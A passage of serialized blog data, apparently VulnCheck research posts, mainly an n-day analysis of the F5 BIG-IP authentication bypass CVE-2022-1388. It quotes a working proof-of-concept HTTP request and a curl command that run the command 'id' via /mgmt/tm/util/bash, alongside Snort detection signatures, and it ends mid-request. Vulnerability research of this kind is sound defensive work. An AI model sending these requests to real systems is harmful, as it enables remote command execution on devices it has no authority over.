response:",[1354,100689,100692],{"className":100690,"code":100691,"language":1359,"meta":219},[1357],"192.168.56.1 - - [19\u002FApr\u002F2023:19:46:21 +0000] \"POST \u002Findex.php?c=blocked&action=continue HTTP\u002F1.1\" 302 - \"-\" \"curl\u002F7.88.1\"\n",[886,100693,100691],{"__ignoreMap":219},[18,100695,100696,100697,100699],{},"It isn't much, but it's something to look for when hunting for exploitation. Note that writing the log entry may block on command execution. Additionally, the previous ",[886,100698,100605],{}," output can be used for process detections.",[1920,100701,2850],{"id":2849},[61,100703,36665],{"id":36664},[1789,100705,100706],{},[25,100707,100708,10515,100712],{},[47,100709,100710],{"href":100710,"rel":100711},"https:\u002F\u002Fwww.sophos.com\u002Fen-us\u002Fsecurity-advisories\u002Fsophos-sa-20230404-swa-rce",[51],[47,100713,36677],{"href":36676},[2901,100715,100716],{},"html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sSBr1, html code.shiki .sSBr1{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}",{"title":219,"searchDepth":220,"depth":220,"links":100718},[100719],{"id":36664,"depth":220,"text":36665},"2023-04-21","CVE-2023-1671 is a pre-authenticated command injection in Sophos Web Appliance. In this blog post, VulnCheck researchers analyze the vulnerability and develop a proof of concept (PoC) for it.",{"slug":100723},"cve-2023-1671-analysis","\u002Fblog\u002Fcve-2023-1671-analysis",{"title":99869,"description":100721},"blog\u002Fcve-2023-1671-analysis",[242],"KsKFXd7fPY5GMbSe-1Ml8szjZO6AF6W4Im0-ty3Foq0",{"id":100730,"title":100731,"articles":100732,"authors":100741,"body":100743,"date":103268,"description":103269,"extension":234,"image":7,"link":7,"meta":103270,"navigation":237,"path":103272,"seo":103273,"series":7,"stem":103274,"subtype":7,"tags":103275,"__hash__":103276},"blog\u002Fblog\u002Fnew-cve-2022-1388.md","Finding Something New About CVE-2022-1388",[100733,100737],{"title":100734,"source":11233,"link":100735,"date":100736},"Under the Weather, Beating Roulette, Monitoring Macs, ^ XBMC Glory Days","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002Funder-the-weather-taxonomy-beating-roulette-monitoring-macs-xbmc-glory-days-psw-781","2023-04-19",{"title":100738,"source":100739,"link":100740,"date":84768},"So, You Think of Cybersecurity Only as a Cost Center? Think Again.","National Law Review","https:\u002F\u002Fwww.natlawreview.com\u002Farticle\u002Fso-you-think-cybersecurity-only-cost-center-think-again",[100742],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":100744,"toc":103254},[100745,100757,100799,100827,100830,100834,100837,100853,100867,100950,100953,100957,100960,100972,100975,101216,101219,101339,101342,101507,101510,101514,101517,101526,101530,101538,101551,101557,101702,101705,101729,101741,101771,101787,101810,101813,101817,101839,101965,101974,101978,101999,102122,102130,102136,102140,102157,102305,102313,102336,102341,102344,102348,102361,102369,102404,102410,102566,102569,102672,102675,102681,102693,102760,102763,102767,102786,102791,102794,102808,102823,102829,102855,102861,102886,102898,103056,103060,103063,103213,103223,103236,103238,103244,103251],[18,100746,100747,100748,100753,100754,59],{},"One of the things we do at VulnCheck is ",[47,100749,100752],{"href":100750,"rel":100751},"https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fthe-overlooked-problem-of-n-day-vulnerabilities",[51],"n-day"," analysis. That can include analysis of well-known, deeply researched, and widely exploited vulnerabilities. When we tackle that type of issue, we aim to learn something new, novel, or, at the very least, interesting. We recently took that approach analyzing ",[47,100755,92074],{"href":92072,"rel":100756},[51],[18,100758,100759,100760,100765,100766,10515,100771,1246,100776,100781,100782,100787,100788,100793,100794,59],{},"CVE-2022-1388 is an authentication bypass vulnerability affecting F5 Big-IP products. When CVE-2022-1388 was disclosed in May 2022, there were only a ",[47,100761,100764],{"href":100762,"rel":100763},"https:\u002F\u002Ftrends.shodan.io\u002Fsearch?query=http.title%3A%22BIG-IP%26reg%3B-Redirect%22+%2B%22Server%22®%3B-+Redirect%22++%22Server%22=#facet\u002Foverview",[51],"few thousand internet-facing affected systems",". But there was no stopping the infosec hype train. Multiple research organizations published ",[47,100767,100770],{"href":100768,"rel":100769},"https:\u002F\u002Ftwitter.com\u002Fvcslab\u002Fstatus\u002F1523259088259346432",[51],"redacted",[47,100772,100775],{"href":100773,"rel":100774},"https:\u002F\u002Ftwitter.com\u002Fptswarm\u002Fstatus\u002F1522873828896034816",[51],"proof of concepts",[47,100777,100780],{"href":100778,"rel":100779},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20220513035505\u002Fhttps:\u002F\u002Ftwitter.com\u002FGossiTheDog\u002Fstatus\u002F1521964444380708865",[51],"Kevin Beaumont"," was tweeting about honeypot exploitation, randoms were dropping exploit ",[47,100783,100786],{"href":100784,"rel":100785},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20220509072529\u002Fhttps:\u002F\u002Ftwitter.com\u002FAnnaViolet20\u002Fstatus\u002F1523564632140509184",[51],"screenshots",", and reporters were ",[47,100789,100792],{"href":100790,"rel":100791},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=1IChiQZM7EY&t=105s",[51],"mistaking jokes about an inside job"," for reality. Eventually, most of the speculation and fear-mongering were put to bed by an excellent deep-dive analysis from ",[47,100795,100798],{"href":100796,"rel":100797},"https:\u002F\u002Fwww.horizon3.ai\u002Ff5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive\u002F",[51],"Horizon3.ai",[18,100800,100801,100802,1255,100806,100810,100811,100815,100816,100821,100822,100826],{},"When all the hype died down, the vulnerability was quite well-known. It’s been featured in research write-ups. There’s a Metasploit ",[47,100803,49176],{"href":100804,"rel":100805},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002Ffef3796d43f851d286f1909c6021c19fa7c449d4\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Ff5_icontrol_rce.rb#L34",[51],[47,100807,86601],{"href":100808,"rel":100809},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002F?gnql=tags%3A%22F5%20BIG-IP%20iControl%20REST%20Authentication%20Bypass%22",[51]," tag. ",[47,100812,31654],{"href":100813,"rel":100814},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmonitoring\u002Fvulnerability\u002F?category=monitoring&statistic=unique_ips&iot=No&cisa_kev=yes",[51]," identifies the vulnerability in their honeypot network. It was even named one of the [top vulnerabilities in ",[47,100817,100820],{"href":100818,"rel":100819},"https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fblogs\u002Ftop-security-vulnerabilities\u002F",[51],"2022",", and added to the ",[47,100823,100825],{"href":2864,"rel":100824},[51],"CISA KEV Catalog",". What more could be said about this vulnerability?",[18,100828,100829],{},"Well, if you don’t look, you’ll never know.",[61,100831,100833],{"id":100832},"exploit-summarization","Exploit Summarization",[18,100835,100836],{},"Before we go off on our hunt, it’s useful to know what a standard CVE-2022-1388 exploit looks like. Horizon3.ai’s technical write-up provides the following four elements (verbatim) that are required to exploit CVE-2022-1388:",[1925,100838,100839],{},[1789,100840,100841,100844,100847,100850],{},[25,100842,100843],{},"Connection header must include X-F5-Auth-Token",[25,100845,100846],{},"X-F5-Auth-Token header must be present",[25,100848,100849],{},"Host header must be localhost \u002F 127.0.0.1 or the Connection header must include X-Forwarded-Host",[25,100851,100852],{},"Auth header must be set with the admin username and any password",[18,100854,100855,100856,100859,100860,100863,100864,100866],{},"The four bullet points describe ",[1131,100857,100858],{},"the authentication bypass",". Additionally, Horizon3.ai pointed out an HTTP endpoint that would allow attackers, after they exploited CVE-2022-1388, to execute arbitrary commands. That endpoint was ",[886,100861,100862],{},"\u002Fmgmt\u002Ftm\u002Futil\u002Fbash",". Horizon3.ai also offered the following HTTP request as a proof of concept (this will execute the Linux command ",[886,100865,26412],{}," on the remote target):",[1354,100868,100870],{"className":31740,"code":100869,"language":2186,"meta":219,"style":219},"POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\nHost: 127.0.0.1\nAuthorization: Basic YWRtaW46aG9yaXpvbjM=\nX-F5-Auth-Token: asdf\nUser-Agent: curl\u002F7.82.0\nConnection: X-F5-Auth-Token\nAccept: *\u002F*\nContent-Length: 39\n{“command”:”run”,”utilCmdArgs”:”-c id”}\n",[886,100871,100872,100881,100888,100899,100907,100914,100922,100933,100940],{"__ignoreMap":219},[1373,100873,100874,100876,100879],{"class":1375,"line":1376},[1373,100875,6946],{"class":2206},[1373,100877,100878],{"class":1391}," \u002Fmgmt\u002Ftm\u002Futil\u002Fbash",[1373,100880,35589],{"class":1391},[1373,100882,100883,100885],{"class":1375,"line":220},[1373,100884,99283],{"class":2206},[1373,100886,100887],{"class":5467}," 127.0.0.1\n",[1373,100889,100890,100893,100896],{"class":1375,"line":1266},[1373,100891,100892],{"class":2206},"Authorization:",[1373,100894,100895],{"class":1391}," Basic",[1373,100897,100898],{"class":1391}," YWRtaW46aG9yaXpvbjM=\n",[1373,100900,100901,100904],{"class":1375,"line":1852},[1373,100902,100903],{"class":2206},"X-F5-Auth-Token:",[1373,100905,100906],{"class":1391}," asdf\n",[1373,100908,100909,100911],{"class":1375,"line":4692},[1373,100910,99291],{"class":2206},[1373,100912,100913],{"class":1391}," curl\u002F7.82.0\n",[1373,100915,100916,100919],{"class":1375,"line":4724},[1373,100917,100918],{"class":2206},"Connection:",[1373,100920,100921],{"class":1391}," X-F5-Auth-Token\n",[1373,100923,100924,100927,100929,100931],{"class":1375,"line":4756},[1373,100925,100926],{"class":2206},"Accept:",[1373,100928,19113],{"class":6761},[1373,100930,2180],{"class":1391},[1373,100932,35618],{"class":6761},[1373,100934,100935,100937],{"class":1375,"line":4768},[1373,100936,99333],{"class":2206},[1373,100938,100939],{"class":5467}," 39\n",[1373,100941,100942,100944,100947],{"class":1375,"line":4792},[1373,100943,9149],{"class":1383},[1373,100945,100946],{"class":2206},"“command”:”run”,”utilCmdArgs”:”-c",[1373,100948,100949],{"class":1391}," id”}\n",[18,100951,100952],{},"That’s the basis of exploitation and what a generic CVE-2022-1388 exploit looks like on the wire. Our goal for this n-day analysis is to iterate on public knowledge and find something new and\u002For interesting to say.",[61,100954,100956],{"id":100955},"open-source-detections","Open Source Detections",[18,100958,100959],{},"A good place to start on this sort of task is collecting open-source exploit detections. Detections often summarize the heart of the problem in an easily digestible signature. Additionally, we can determine if we’re on an interesting path of inquiry by comparing the detections against any new exploits we devise. If all else fails (e.g. we can’t find any new or interesting exploitation techniques), finding a weakness in a commonly used signature is an interesting little tidbit to share with customers.",[18,100961,100962,100963,100967,100968,100971],{},"We are aware of five open-source Snort 2.9 signatures for CVE-2022-1388. Three in the ",[47,100964,92083],{"href":100965,"rel":100966},"https:\u002F\u002Frules.emergingthreats.net\u002Fopen\u002F",[51]," (although we’ll only discuss one because they are all tightly linked), and two in the ",[47,100969,92088],{"href":92086,"rel":100970},[51],". The rules, modified for readability and with some of the metadata stripped for brevity, follow.",[18,100973,100974],{},"Emerging Threats Snort 2.9 Signature ID 2036556:",[1354,100976,100980],{"className":100977,"code":100978,"language":100979,"meta":219,"style":219},"language-py shiki shiki-themes material-theme-lighter github-light github-dark monokai","alert tcp any any -> $HOME_NET $HTTP_PORTS (msg:\"ET EXPLOIT F5 BIG-IP iControl REST authentication bypass attempt (CVE-2022-1388) M2\"; \\\n flow:established,to_server; \\\n content:!\"GET\"; http_method; \\\n content:\"\u002Fmgmt\u002Ftm\"; http_uri; depth:8; \\\n content:\"Authorization|3a 20|Basic YWRtaW46\"; http_header; \\\n content:\"x-F5-Auth-Token\"; http_header; nocase; \\\n pcre:\"\u002F^Connection\\x3a\\x20[^\\r\\n]+x-F5-Auth-Token\u002FHmi\"; \\\n content:!\"Referer|3a 20|\"; http_header; \\\n content:\"X-F5-Auth-Token|3a 20|\"; fast_pattern; http_header; \\\n classtype:trojan-activity; sid:2036556; rev:2;)\n","py",[886,100981,100982,101023,101040,101059,101083,101101,101119,101148,101167,101185],{"__ignoreMap":219},[1373,100983,100984,100987,100989,100991,100994,100996,100999,101001,101004,101006,101009,101011,101013,101016,101018,101021],{"class":1375,"line":1376},[1373,100985,100986],{"class":4640},"alert tcp ",[1373,100988,99083],{"class":1379},[1373,100990,99071],{"class":1379},[1373,100992,100993],{"class":28571}," ->",[1373,100995,4656],{"class":28571},[1373,100997,100998],{"class":2326},"HOME_NET",[1373,101000,4656],{"class":28571},[1373,101002,101003],{"class":11735},"HTTP_PORTS ",[1373,101005,1384],{"class":1383},[1373,101007,101008],{"class":11735},"msg",[1373,101010,4606],{"class":1383},[1373,101012,183],{"class":1387},[1373,101014,101015],{"class":1391},"ET EXPLOIT F5 BIG-IP iControl REST authentication bypass attempt (CVE-2022-1388) M2",[1373,101017,183],{"class":1387},[1373,101019,101020],{"class":11735},"; ",[1373,101022,99089],{"class":1383},[1373,101024,101025,101028,101030,101033,101035,101038],{"class":1375,"line":220},[1373,101026,101027],{"class":11735}," flow",[1373,101029,4606],{"class":1383},[1373,101031,101032],{"class":11735},"established",[1373,101034,5437],{"class":1383},[1373,101036,101037],{"class":11735},"to_server; ",[1373,101039,99089],{"class":1383},[1373,101041,101042,101044,101046,101048,101050,101052,101054,101057],{"class":1375,"line":1266},[1373,101043,51846],{"class":11735},[1373,101045,4606],{"class":1383},[1373,101047,16090],{"class":11735},[1373,101049,183],{"class":1387},[1373,101051,6284],{"class":1391},[1373,101053,183],{"class":1387},[1373,101055,101056],{"class":11735},"; http_method; ",[1373,101058,99089],{"class":1383},[1373,101060,101061,101063,101065,101067,101070,101072,101075,101077,101079,101081],{"class":1375,"line":1852},[1373,101062,51846],{"class":11735},[1373,101064,4606],{"class":1383},[1373,101066,183],{"class":1387},[1373,101068,101069],{"class":1391},"\u002Fmgmt\u002Ftm",[1373,101071,183],{"class":1387},[1373,101073,101074],{"class":11735},"; http_uri; depth",[1373,101076,4606],{"class":1383},[1373,101078,37681],{"class":5467},[1373,101080,101020],{"class":11735},[1373,101082,99089],{"class":1383},[1373,101084,101085,101087,101089,101091,101094,101096,101099],{"class":1375,"line":4692},[1373,101086,51846],{"class":11735},[1373,101088,4606],{"class":1383},[1373,101090,183],{"class":1387},[1373,101092,101093],{"class":1391},"Authorization|3a 20|Basic YWRtaW46",[1373,101095,183],{"class":1387},[1373,101097,101098],{"class":11735},"; http_header; ",[1373,101100,99089],{"class":1383},[1373,101102,101103,101105,101107,101109,101112,101114,101117],{"class":1375,"line":4724},[1373,101104,51846],{"class":11735},[1373,101106,4606],{"class":1383},[1373,101108,183],{"class":1387},[1373,101110,101111],{"class":1391},"x-F5-Auth-Token",[1373,101113,183],{"class":1387},[1373,101115,101116],{"class":11735},"; http_header; nocase; ",[1373,101118,99089],{"class":1383},[1373,101120,101121,101124,101126,101128,101131,101134,101137,101139,101142,101144,101146],{"class":1375,"line":4756},[1373,101122,101123],{"class":11735}," pcre",[1373,101125,4606],{"class":1383},[1373,101127,183],{"class":1387},[1373,101129,101130],{"class":1391},"\u002F^Connection",[1373,101132,101133],{"class":2326},"\\x3a\\x20",[1373,101135,101136],{"class":1391},"[^",[1373,101138,15491],{"class":2326},[1373,101140,101141],{"class":1391},"]+x-F5-Auth-Token\u002FHmi",[1373,101143,183],{"class":1387},[1373,101145,101020],{"class":11735},[1373,101147,99089],{"class":1383},[1373,101149,101150,101152,101154,101156,101158,101161,101163,101165],{"class":1375,"line":4768},[1373,101151,51846],{"class":11735},[1373,101153,4606],{"class":1383},[1373,101155,16090],{"class":11735},[1373,101157,183],{"class":1387},[1373,101159,101160],{"class":1391},"Referer|3a 20|",[1373,101162,183],{"class":1387},[1373,101164,101098],{"class":11735},[1373,101166,99089],{"class":1383},[1373,101168,101169,101171,101173,101175,101178,101180,101183],{"class":1375,"line":4792},[1373,101170,51846],{"class":11735},[1373,101172,4606],{"class":1383},[1373,101174,183],{"class":1387},[1373,101176,101177],{"class":1391},"X-F5-Auth-Token|3a 20|",[1373,101179,183],{"class":1387},[1373,101181,101182],{"class":11735},"; fast_pattern; http_header; ",[1373,101184,99089],{"class":1383},[1373,101186,101187,101190,101192,101195,101197,101200,101202,101205,101208,101210,101212,101214],{"class":1375,"line":4798},[1373,101188,101189],{"class":11735}," classtype",[1373,101191,4606],{"class":1383},[1373,101193,101194],{"class":11735},"trojan",[1373,101196,61062],{"class":1397},[1373,101198,101199],{"class":11735},"activity; sid",[1373,101201,4606],{"class":1383},[1373,101203,101204],{"class":5467},"2036556",[1373,101206,101207],{"class":11735},"; rev",[1373,101209,4606],{"class":1383},[1373,101211,353],{"class":5467},[1373,101213,39663],{"class":11735},[1373,101215,11875],{"class":1383},[18,101217,101218],{},"Snort 2.9 Community Signature ID 57336 (commented out by default):",[1354,101220,101222],{"className":100977,"code":101221,"language":100979,"meta":219,"style":219},"alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:\"POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt\"; \\\n flow:to_server,established;\n content:\"\u002Fmgmt\u002Ftm\u002Futil\u002Fbash\"; fast_pattern:only; http_uri;\n content:\"command\"; nocase; http_client_body;\n classtype:policy-violation; sid:57336; rev:3;)\n",[886,101223,101224,101262,101276,101296,101311],{"__ignoreMap":219},[1373,101225,101226,101228,101230,101233,101235,101237,101239,101241,101243,101245,101247,101249,101251,101253,101256,101258,101260],{"class":1375,"line":1376},[1373,101227,100986],{"class":4640},[1373,101229,4644],{"class":28571},[1373,101231,101232],{"class":2326},"EXTERNAL_NET",[1373,101234,99071],{"class":1379},[1373,101236,100993],{"class":28571},[1373,101238,4656],{"class":28571},[1373,101240,100998],{"class":2326},[1373,101242,4656],{"class":28571},[1373,101244,101003],{"class":11735},[1373,101246,1384],{"class":1383},[1373,101248,101008],{"class":11735},[1373,101250,4606],{"class":1383},[1373,101252,183],{"class":1387},[1373,101254,101255],{"class":1391},"POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt",[1373,101257,183],{"class":1387},[1373,101259,101020],{"class":11735},[1373,101261,99089],{"class":1383},[1373,101263,101264,101266,101268,101271,101273],{"class":1375,"line":220},[1373,101265,101027],{"class":11735},[1373,101267,4606],{"class":1383},[1373,101269,101270],{"class":11735},"to_server",[1373,101272,5437],{"class":1383},[1373,101274,101275],{"class":11735},"established;\n",[1373,101277,101278,101280,101282,101284,101286,101288,101291,101293],{"class":1375,"line":1266},[1373,101279,51846],{"class":11735},[1373,101281,4606],{"class":1383},[1373,101283,183],{"class":1387},[1373,101285,100862],{"class":1391},[1373,101287,183],{"class":1387},[1373,101289,101290],{"class":11735},"; fast_pattern",[1373,101292,4606],{"class":1383},[1373,101294,101295],{"class":11735},"only; http_uri;\n",[1373,101297,101298,101300,101302,101304,101306,101308],{"class":1375,"line":1852},[1373,101299,51846],{"class":11735},[1373,101301,4606],{"class":1383},[1373,101303,183],{"class":1387},[1373,101305,16758],{"class":1391},[1373,101307,183],{"class":1387},[1373,101309,101310],{"class":11735},"; nocase; http_client_body;\n",[1373,101312,101313,101315,101317,101319,101321,101324,101326,101329,101331,101333,101335,101337],{"class":1375,"line":4692},[1373,101314,101189],{"class":11735},[1373,101316,4606],{"class":1383},[1373,101318,14797],{"class":11735},[1373,101320,61062],{"class":1397},[1373,101322,101323],{"class":11735},"violation; sid",[1373,101325,4606],{"class":1383},[1373,101327,101328],{"class":5467},"57336",[1373,101330,101207],{"class":11735},[1373,101332,4606],{"class":1383},[1373,101334,491],{"class":5467},[1373,101336,39663],{"class":11735},[1373,101338,11875],{"class":1383},[18,101340,101341],{},"Snort 2.9 Community Signature ID 59735:",[1354,101343,101345],{"className":100977,"code":101344,"language":100979,"meta":219,"style":219},"alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:\"SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt\"; \\\n flow:to_server,established; \\\n content:\"Connection:\"; nocase; http_header; \\\n content:\"X-F5-Auth\"; distance:0; fast_pattern; nocase; http_header; \\\n pcre:\"\u002F^Connection:[^\\r\\n]*?X-F5-Auth\u002FHim\";\n reference:cve,2022-1388; classtype:attempted-user; sid:59735; rev:2;)\n",[886,101346,101347,101384,101399,101416,101441,101461],{"__ignoreMap":219},[1373,101348,101349,101351,101353,101355,101357,101359,101361,101363,101365,101367,101369,101371,101373,101375,101378,101380,101382],{"class":1375,"line":1376},[1373,101350,100986],{"class":4640},[1373,101352,4644],{"class":28571},[1373,101354,101232],{"class":2326},[1373,101356,99071],{"class":1379},[1373,101358,100993],{"class":28571},[1373,101360,4656],{"class":28571},[1373,101362,100998],{"class":2326},[1373,101364,4656],{"class":28571},[1373,101366,101003],{"class":11735},[1373,101368,1384],{"class":1383},[1373,101370,101008],{"class":11735},[1373,101372,4606],{"class":1383},[1373,101374,183],{"class":1387},[1373,101376,101377],{"class":1391},"SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt",[1373,101379,183],{"class":1387},[1373,101381,101020],{"class":11735},[1373,101383,99089],{"class":1383},[1373,101385,101386,101388,101390,101392,101394,101397],{"class":1375,"line":220},[1373,101387,101027],{"class":11735},[1373,101389,4606],{"class":1383},[1373,101391,101270],{"class":11735},[1373,101393,5437],{"class":1383},[1373,101395,101396],{"class":11735},"established; ",[1373,101398,99089],{"class":1383},[1373,101400,101401,101403,101405,101407,101409,101411,101414],{"class":1375,"line":1266},[1373,101402,51846],{"class":11735},[1373,101404,4606],{"class":1383},[1373,101406,183],{"class":1387},[1373,101408,100918],{"class":1391},[1373,101410,183],{"class":1387},[1373,101412,101413],{"class":11735},"; nocase; http_header; ",[1373,101415,99089],{"class":1383},[1373,101417,101418,101420,101422,101424,101427,101429,101432,101434,101436,101439],{"class":1375,"line":1852},[1373,101419,51846],{"class":11735},[1373,101421,4606],{"class":1383},[1373,101423,183],{"class":1387},[1373,101425,101426],{"class":1391},"X-F5-Auth",[1373,101428,183],{"class":1387},[1373,101430,101431],{"class":11735},"; distance",[1373,101433,4606],{"class":1383},[1373,101435,445],{"class":5467},[1373,101437,101438],{"class":11735},"; fast_pattern; nocase; http_header; ",[1373,101440,99089],{"class":1383},[1373,101442,101443,101445,101447,101449,101452,101454,101457,101459],{"class":1375,"line":4692},[1373,101444,101123],{"class":11735},[1373,101446,4606],{"class":1383},[1373,101448,183],{"class":1387},[1373,101450,101451],{"class":1391},"\u002F^Connection:[^",[1373,101453,15491],{"class":2326},[1373,101455,101456],{"class":1391},"]*?X-F5-Auth\u002FHim",[1373,101458,183],{"class":1387},[1373,101460,4912],{"class":11735},[1373,101462,101463,101466,101468,101470,101472,101474,101476,101479,101482,101484,101487,101489,101492,101494,101497,101499,101501,101503,101505],{"class":1375,"line":4724},[1373,101464,101465],{"class":11735}," reference",[1373,101467,4606],{"class":1383},[1373,101469,242],{"class":11735},[1373,101471,5437],{"class":1383},[1373,101473,100820],{"class":5467},[1373,101475,61062],{"class":1397},[1373,101477,101478],{"class":5467},"1388",[1373,101480,101481],{"class":11735},"; classtype",[1373,101483,4606],{"class":1383},[1373,101485,101486],{"class":11735},"attempted",[1373,101488,61062],{"class":1397},[1373,101490,101491],{"class":11735},"user; sid",[1373,101493,4606],{"class":1383},[1373,101495,101496],{"class":5467},"59735",[1373,101498,101207],{"class":11735},[1373,101500,4606],{"class":1383},[1373,101502,353],{"class":5467},[1373,101504,39663],{"class":11735},[1373,101506,11875],{"class":1383},[18,101508,101509],{},"All three Snort rules detect Horizon3.ai’s proof of concept HTTP request, so that’s a great start for all parties. Let’s see if we can find something that these signatures won’t detect.",[61,101511,101513],{"id":101512},"exploit-variants","Exploit Variants",[18,101515,101516],{},"It’s tempting to load up a Java decompiler and start looking at the F5 BIG-IP management REST API ourselves, but that’s a bit premature. This vulnerability is approaching its first birthday, and many people have already analyzed it. Many of their findings have manifested as proof of concept exploits. A good next step is collecting those exploits and exploring what types of variants already exist in public.",[18,101518,101519,101520,101525],{},"Fortunately, VulnCheck tracks exploit sources. For the purposes of this blog, let’s focus on GitHub as the source. VulnCheck has indexed more than 50 non-fork “unique” stand-alone GitHub exploits for CVE-2022-1388. Excluding those that ",[47,101521,101524],{"href":101522,"rel":101523},"https:\u002F\u002Fraw.githubusercontent.com\u002Fiveresk\u002Fcve-2022-1388-1veresk\u002Fmain\u002Fcve-2022-1388.sh",[51],"don’t work",", we found that CVE-2022-1388 appears to have four exploit variants on GitHub",[993,101527,101529],{"id":101528},"_1-the-horizon3ai-variant","1. The Horizon3.ai Variant",[18,101531,101532,101533,101537],{},"Horizon3.ai published an exploit on ",[47,101534,2485],{"href":101535,"rel":101536},"https:\u002F\u002Fraw.githubusercontent.com\u002Fhorizon3ai\u002FCVE-2022-1388\u002Fmain\u002FCVE-2022-1388.py",[51]," that, depending on the attacker provided command, exactly mirrors the proof of concept HTTP request shared in their technical write-up (included above). This variant has all five of the elements suggested by Horizon3.ai:",[18,101539,101540,101541,101543,101544,101546,101547,101550],{},"HTTP POST to ",[886,101542,100862],{},"\nA Host header using ",[886,101545,48753],{},"\nAn Authorization header using Basic base64(admin:horizon3) (or the password of your choosing)\nA Connection header that only contains ",[886,101548,101549],{},"X-F5-Auth-Token","\nAn X-F5-Auth-Token header that can contain any value.",[18,101552,101553,101554,101556],{},"This is easily reproduced using the following ",[886,101555,1557],{}," request:",[1354,101558,101560],{"className":31740,"code":101559,"language":2186,"meta":219,"style":219},"curl -kv -H 'Content-Type: application\u002Fjson' -H \"Host: 127.0.0.1\" -H 'Connection: X-F5-Auth-Token' -H 'X-F5-Auth-Token: authtoken' -H 'Authorization: Basic YWRtaW468J+mng==' -d '{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}' https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash;\n> POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\n> Host: 127.0.0.1\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Type: application\u002Fjson\n> Connection: X-F5-Auth-Token\n> X-F5-Auth-Token: authtoken\n> Authorization: Basic YWRtaW468J+mng==\n> Content-Length: 